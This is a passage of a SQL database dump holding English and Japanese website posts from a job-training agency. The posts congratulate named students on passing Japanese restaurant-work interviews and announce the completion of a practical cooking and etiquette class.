('activities', 0, 127, 553, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congrats <strong>YU WAI PHYO</strong> , <strong>SOE SANDAR HTWE</strong>, <strong>PANN EI ZAW</strong> for Tokutei Gaishoku (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/pann%20ei%20zaw.jpg\" data-entity-uuid=\"20ae1406-4043-4478-a49e-742e89470e62\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/soe%20sandar%20htwe.jpg\" data-entity-uuid=\"f3a2deb2-6f5c-4b32-9597-32e99fb4a8be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20wai%20phyo.jpg\" data-entity-uuid=\"42853554-ebd5-4f1d-a743-230c2a126fc4\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 128, 554, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations for <strong>NAN THAE NU SOE</strong>, <strong>EI EI MIN</strong>, <strong>HLAING MEE MEE HTIKE</strong>, <strong>PYAE SU SU SAN&nbsp;</strong></p><img data-entity-uuid=\"05a66305-08bd-45a3-abf5-dff8b6907f3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20EI%20MIN.jpg\"><img data-entity-uuid=\"0590a05b-3319-4571-b668-8bde1c1ec54f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HLAING%20MEE%20MEE%20HTIKE.jpg\"><img data-entity-uuid=\"15e619d7-4901-458e-ac12-ff3043e2f39b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NAN%20THAE%20NU%20SOE.jpg\"><img data-entity-uuid=\"0802a1f5-f0d5-4eb5-9323-2cc42922b62b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PYAE%20SU%20SU%20SAN.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 128, 555, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations for <strong>NAN THAE NU SOE</strong>, <strong>EI EI MIN</strong>, <strong>HLAING MEE MEE HTIKE</strong>, <strong>PYAE SU SU SAN&nbsp;</strong></p><img data-entity-uuid=\"05a66305-08bd-45a3-abf5-dff8b6907f3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20EI%20MIN.jpg\"><img data-entity-uuid=\"0590a05b-3319-4571-b668-8bde1c1ec54f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HLAING%20MEE%20MEE%20HTIKE.jpg\"><img data-entity-uuid=\"15e619d7-4901-458e-ac12-ff3043e2f39b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NAN%20THAE%20NU%20SOE.jpg\"><img data-entity-uuid=\"0802a1f5-f0d5-4eb5-9323-2cc42922b62b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PYAE%20SU%20SU%20SAN.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 128, 555, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations for <strong>NAN THAE NU SOE</strong>, <strong>EI EI MIN</strong>, <strong>HLAING MEE MEE HTIKE</strong>, <strong>PYAE SU SU SAN&nbsp;</strong></p><img src=\"/sites/default/files/inline-images/EI%20EI%20MIN.jpg\" data-entity-uuid=\"05a66305-08bd-45a3-abf5-dff8b6907f3a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HLAING%20MEE%20MEE%20HTIKE.jpg\" data-entity-uuid=\"0590a05b-3319-4571-b668-8bde1c1ec54f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NAN%20THAE%20NU%20SOE.jpg\" data-entity-uuid=\"15e619d7-4901-458e-ac12-ff3043e2f39b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/PYAE%20SU%20SU%20SAN.jpg\" data-entity-uuid=\"0802a1f5-f0d5-4eb5-9323-2cc42922b62b\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 129, 556, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations KAY THARI TOE, MAY HLA MYO, NILA AUNG.&nbsp;</p><img data-entity-uuid=\"0e2594d9-768b-4dfa-9ba0-ba3e06ebbe85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAY%20THARI%20TOE.jpg\"><img data-entity-uuid=\"578fa207-50dd-4808-8913-e69f51d16e7c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/MAY%20HLA%20MYO.jpg\"><img data-entity-uuid=\"f4047036-cd6d-4501-87db-a965dd12fda4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NILA%20AUNG.jpg\">', '', 'full_html'),
('activities', 0, 129, 557, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations KAY THARI TOE, MAY HLA MYO, NILA AUNG.&nbsp;</p><img data-entity-uuid=\"0e2594d9-768b-4dfa-9ba0-ba3e06ebbe85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KAY%20THARI%20TOE.jpg\"><img data-entity-uuid=\"578fa207-50dd-4808-8913-e69f51d16e7c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/MAY%20HLA%20MYO.jpg\"><img data-entity-uuid=\"f4047036-cd6d-4501-87db-a965dd12fda4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NILA%20AUNG.jpg\">', '', 'full_html'),
('activities', 0, 129, 557, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations KAY THARI TOE, MAY HLA MYO, NILA AUNG.&nbsp;</p><img src=\"/sites/default/files/inline-images/KAY%20THARI%20TOE.jpg\" data-entity-uuid=\"0e2594d9-768b-4dfa-9ba0-ba3e06ebbe85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MAY%20HLA%20MYO.jpg\" data-entity-uuid=\"578fa207-50dd-4808-8913-e69f51d16e7c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NILA%20AUNG.jpg\" data-entity-uuid=\"f4047036-cd6d-4501-87db-a965dd12fda4\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 130, 558, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>THANT ZIN WIN</li><li>HTET LIN AUNG</li><li>EI KAY ZIN</li><li>MOE SET NAING</li><li>PAING THU SAN</li><li>HPONE MYAT NAING</li></ul><img data-entity-uuid=\"9751b169-606f-4a3f-b8d7-473f6d711931\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20KAY%20ZIN.jpg\"><img data-entity-uuid=\"bba51a53-315f-4ea0-b285-2b1c466ce229\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HPONE%20MYAT%20NAING.jpg\"><img data-entity-uuid=\"8752ce74-bee3-4e57-8101-78e533f321ba\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HTET%20LIN%20AUNG.jpg\"><img data-entity-uuid=\"b174b808-6bc9-41f8-8f37-0d621fe3b964\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/MOE%20SET%20NAING.jpg\"><img data-entity-uuid=\"7e2b0631-68f5-4ea9-947a-e18e5f47ed4a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PAING%20THU%20SAN.jpg\"><img data-entity-uuid=\"3e16c2f1-e005-461f-bd05-0ec06e6efc03\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THANT%20ZIN%20WIN.jpg\">', '', 'full_html'),
('activities', 0, 130, 559, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>THANT ZIN WIN</li><li>HTET LIN AUNG</li><li>EI KAY ZIN</li><li>MOE SET NAING</li><li>PAING THU SAN</li><li>HPONE MYAT NAING</li></ul><img data-entity-uuid=\"9751b169-606f-4a3f-b8d7-473f6d711931\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/EI%20KAY%20ZIN.jpg\"><img data-entity-uuid=\"bba51a53-315f-4ea0-b285-2b1c466ce229\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HPONE%20MYAT%20NAING.jpg\"><img data-entity-uuid=\"8752ce74-bee3-4e57-8101-78e533f321ba\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HTET%20LIN%20AUNG.jpg\"><img data-entity-uuid=\"b174b808-6bc9-41f8-8f37-0d621fe3b964\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/MOE%20SET%20NAING.jpg\"><img data-entity-uuid=\"7e2b0631-68f5-4ea9-947a-e18e5f47ed4a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PAING%20THU%20SAN.jpg\"><img data-entity-uuid=\"3e16c2f1-e005-461f-bd05-0ec06e6efc03\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THANT%20ZIN%20WIN.jpg\">', '', 'full_html'),
('activities', 0, 130, 559, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>THANT ZIN WIN</li><li>HTET LIN AUNG</li><li>EI KAY ZIN</li><li>MOE SET NAING</li><li>PAING THU SAN</li><li>HPONE MYAT NAING</li></ul><img src=\"/sites/default/files/inline-images/EI%20KAY%20ZIN.jpg\" data-entity-uuid=\"9751b169-606f-4a3f-b8d7-473f6d711931\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HPONE%20MYAT%20NAING.jpg\" data-entity-uuid=\"bba51a53-315f-4ea0-b285-2b1c466ce229\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/HTET%20LIN%20AUNG.jpg\" data-entity-uuid=\"8752ce74-bee3-4e57-8101-78e533f321ba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MOE%20SET%20NAING.jpg\" data-entity-uuid=\"b174b808-6bc9-41f8-8f37-0d621fe3b964\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/PAING%20THU%20SAN.jpg\" data-entity-uuid=\"7e2b0631-68f5-4ea9-947a-e18e5f47ed4a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THANT%20ZIN%20WIN.jpg\" data-entity-uuid=\"3e16c2f1-e005-461f-bd05-0ec06e6efc03\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 131, 560, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations to KYAW ZIN LATT for passing Interview for TOKUTEI GAISHOKU (restaurant)&nbsp;</p><img data-entity-uuid=\"ee025a8b-04dc-411c-95f6-252d8c41e35e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KYAW%20ZIN%20LATT.jpg\">', '', 'full_html'),
('activities', 0, 131, 561, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations to KYAW ZIN LATT for passing Interview for TOKUTEI GAISHOKU (restaurant)&nbsp;</p><img data-entity-uuid=\"ee025a8b-04dc-411c-95f6-252d8c41e35e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/KYAW%20ZIN%20LATT.jpg\">', '', 'full_html'),
('activities', 0, 131, 561, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>KYAW ZIN LATT</strong>さんがTOKUTEI GAISHOKU（レストラン）の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/KYAW%20ZIN%20LATT.jpg\" data-entity-uuid=\"ee025a8b-04dc-411c-95f6-252d8c41e35e\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 132, 562, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to YIN MAY THU &amp; YAMIN SHWE ZIN for passsing the Job Interview for JAPAN!&nbsp;</p><img src=\"/sites/default/files/inline-images/YAMIN%20SHWE%20ZIN.jpg\" data-entity-uuid=\"34f45fc2-1fa2-43a6-973d-a99dc56e1944\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YIN%20MAY%20THU.jpg\" data-entity-uuid=\"345a9c35-248a-4618-82e0-09ba81c35f89\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 132, 563, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to YIN MAY THU &amp; YAMIN SHWE ZIN for passsing the Job Interview for JAPAN!&nbsp;</p><img src=\"/sites/default/files/inline-images/YAMIN%20SHWE%20ZIN.jpg\" data-entity-uuid=\"34f45fc2-1fa2-43a6-973d-a99dc56e1944\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YIN%20MAY%20THU.jpg\" data-entity-uuid=\"345a9c35-248a-4618-82e0-09ba81c35f89\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 132, 563, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YIN MAY THU さん</strong>と <strong>YAMIN SHWE ZIN さん</strong>が日本の就職面接に合格しました、おめでとうございます!</p><img src=\"/sites/default/files/inline-images/YAMIN%20SHWE%20ZIN.jpg\" data-entity-uuid=\"34f45fc2-1fa2-43a6-973d-a99dc56e1944\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/YIN%20MAY%20THU.jpg\" data-entity-uuid=\"345a9c35-248a-4618-82e0-09ba81c35f89\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 133, 564, 'en', 0, '<blockquote><h2>2nd Batch Pratical Class Completion</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-3\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"9e867f11-c94f-4318-a6c5-69e1c59ec6b1\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>In the Gaishoku practical class, the Japanese native instructor has meticulously instructed on the appropriate vocabulary, etiquette, and protocols for dining in Japanese restaurants.The inaugural Gaishoku First Batch classes, led by instructors with over 30 years of experience in Japan, have concluded successfully today, covering topics ranging from vegetable and meat nomenclature to kitchen operations.We extend our sincere gratitude on behalf of New Comet to the dedicated teachers who impart knowledge in such a structured manner to our students.With our successful training and preparation of interview-passing students, New Comet encourages applications for job opportunities without delay.</p><img src=\"/sites/default/files/inline-images/0-02-01-0c1c787e25a0038a004c8fb1f1f3fef5a1206b844d7b9547f7abeb925d0273aa_8177a77005454691.jpg\" data-entity-uuid=\"8b96569d-54ab-42eb-8511-29e44bc7d66f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1d2afaf1819b313743c675427b7a9036b89100980bf89a95b21232137cba4f6c_d617be5df38857d4.jpg\" data-entity-uuid=\"838d79df-114c-4c64-95cf-79c5ed8a7a04\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-6d78d6e7e6e3c013ffff587c73022012428516c84e4708ef4eddab92785a1b25_e4fa61dc1f0a7eaa.jpg\" data-entity-uuid=\"b80d1b92-a725-44c1-a64d-8dd8415dcbe9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7aea772f8533f509651ad0ce89b0eb5d270b4758f6edd7566f71575c1c12d764_37459e5c5941b0a5.jpg\" data-entity-uuid=\"1d2edae8-34c8-4310-8118-f9551afe3a96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e53bae7c248717b51723e13b61b802d8df17dd4c1c7da8f3b04ec00c5d72ef1_228aff5a82ac6a25.jpg\" data-entity-uuid=\"b68bc03d-52d2-44da-8975-eb3adce1de40\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-2302c783d003bda12faf3fdd393353a03cc6136ae6bb3f9cdfdb068d7b2fac25_7c99ac1472131a12.jpg\" data-entity-uuid=\"defb62ed-14d1-492c-ac75-b58d1404c12d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d5dac7dda6d581cbc470feebbbd468d980c627d2a061f3651e8f19667e488377_60d78d918658494d.jpg\" data-entity-uuid=\"427ad047-f490-47dc-a8fb-c672cbaf09e0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de13510039a9d12d12a13345862bc0c6374a231d8abb6e9d7d62857e50efedab_b7d7f45f1ac532ed.jpg\" data-entity-uuid=\"85aa4ffd-37d9-46d2-8e35-3ae912d0e4b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e3da82c6466cf309c553b6356c24dc7637df56327162829a054e8a1e76707da0_cbef71a7e5f47f26.jpg\" data-entity-uuid=\"25dc1e52-8259-40f7-8161-a809b26f9261\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"text-sm rounded-xl p-4 text-token-text-secondary flex items-center gap-3 fruit:rounded-2xl border border-token-border-light bg-token-main-surface-primary\">&nbsp;</div></div></div></div></div></form></div></div></div>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 133, 565, 'en', 0, '<blockquote><h2>2nd Batch Pratical Class Completion</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-3\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"9e867f11-c94f-4318-a6c5-69e1c59ec6b1\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>In the Gaishoku practical class, the Japanese native instructor has meticulously instructed on the appropriate vocabulary, etiquette, and protocols for dining in Japanese restaurants.The inaugural Gaishoku First Batch classes, led by instructors with over 30 years of experience in Japan, have concluded successfully today, covering topics ranging from vegetable and meat nomenclature to kitchen operations.We extend our sincere gratitude on behalf of New Comet to the dedicated teachers who impart knowledge in such a structured manner to our students.With our successful training and preparation of interview-passing students, New Comet encourages applications for job opportunities without delay.</p><img src=\"/sites/default/files/inline-images/0-02-01-0c1c787e25a0038a004c8fb1f1f3fef5a1206b844d7b9547f7abeb925d0273aa_8177a77005454691.jpg\" data-entity-uuid=\"8b96569d-54ab-42eb-8511-29e44bc7d66f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1d2afaf1819b313743c675427b7a9036b89100980bf89a95b21232137cba4f6c_d617be5df38857d4.jpg\" data-entity-uuid=\"838d79df-114c-4c64-95cf-79c5ed8a7a04\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-6d78d6e7e6e3c013ffff587c73022012428516c84e4708ef4eddab92785a1b25_e4fa61dc1f0a7eaa.jpg\" data-entity-uuid=\"b80d1b92-a725-44c1-a64d-8dd8415dcbe9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7aea772f8533f509651ad0ce89b0eb5d270b4758f6edd7566f71575c1c12d764_37459e5c5941b0a5.jpg\" data-entity-uuid=\"1d2edae8-34c8-4310-8118-f9551afe3a96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9e53bae7c248717b51723e13b61b802d8df17dd4c1c7da8f3b04ec00c5d72ef1_228aff5a82ac6a25.jpg\" data-entity-uuid=\"b68bc03d-52d2-44da-8975-eb3adce1de40\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-2302c783d003bda12faf3fdd393353a03cc6136ae6bb3f9cdfdb068d7b2fac25_7c99ac1472131a12.jpg\" data-entity-uuid=\"defb62ed-14d1-492c-ac75-b58d1404c12d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d5dac7dda6d581cbc470feebbbd468d980c627d2a061f3651e8f19667e488377_60d78d918658494d.jpg\" data-entity-uuid=\"427ad047-f490-47dc-a8fb-c672cbaf09e0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de13510039a9d12d12a13345862bc0c6374a231d8abb6e9d7d62857e50efedab_b7d7f45f1ac532ed.jpg\" data-entity-uuid=\"85aa4ffd-37d9-46d2-8e35-3ae912d0e4b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e3da82c6466cf309c553b6356c24dc7637df56327162829a054e8a1e76707da0_cbef71a7e5f47f26.jpg\" data-entity-uuid=\"25dc1e52-8259-40f7-8161-a809b26f9261\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"text-sm rounded-xl p-4 text-token-text-secondary flex items-center gap-3 fruit:rounded-2xl border border-token-border-light bg-token-main-surface-primary\">&nbsp;</div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 133, 565, 'ja', 0, '<div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-3\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"9e867f11-c94f-4318-a6c5-69e1c59ec6b1\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>第 2 バッチ実習クラス終了</h2></blockquote><p>外食実習クラスでは、日本人のネイティブ講師が、日本のレストランで食事をする際の適切な語彙、エチケット、手順を丁寧に指導しました。日本で 30 年以上の経験を持つ講師が指導する、野菜や肉の命名法から厨房業務まで幅広いトピックを扱った外食第 1 